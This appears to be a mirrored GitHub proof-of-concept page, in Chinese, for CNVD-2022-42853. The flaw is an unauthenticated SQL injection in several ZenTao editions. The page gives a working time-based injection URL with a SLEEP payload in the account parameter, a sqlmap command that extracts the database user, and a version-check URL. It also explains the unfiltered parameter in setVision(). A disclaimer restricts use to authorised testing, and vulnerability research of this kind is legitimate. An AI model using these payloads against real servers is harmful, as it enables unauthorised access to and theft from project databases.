Giters

G3G4X5X6 / CNVD-2022-42853

禅道开源版16.5&16.5beta1,企业版6.5&6.5beta1,旗舰版3.0&3.0beta1的前台SQL注入

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CNVD-2022-42853

禅道(ZenTaoPMS)受影响版本:

开源版:16.5,16.5beta1    
企业版:6.5,6.5beta1    
旗舰版:3.0,3.0beta1

POC

延时POC:

http://ip:port/index.php?account=admin' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))a)-- b

SQLMap POC:

python sqlmap.py -u http://ip:port/index.php?account=admin -p account --current-user

查看版本

http://ip:port/index.php?mode=getconfig

② 登录框看源码

image

漏洞成因

漏洞点出现在以上版本的zbox\app\zentao\framework\base\router.class.php文件里,具体函数为setVision()

该函数未对外界传入的account参数做过滤直接拼接SQL语句,触发SQL注入漏洞

image

从代码里可以看到,$account变量支持$_GET和$_POST两种方法传参,可前台SQLi

免责声明

漏洞披露时间已过CNVD公开日期,该项目仅对内部安全测试提供参考。对外渗透测试请取得授权进行,否则后果自负,与本项目无关。

About

禅道开源版16.5&16.5beta1,企业版6.5&6.5beta1,旗舰版3.0&3.0beta1的前台SQL注入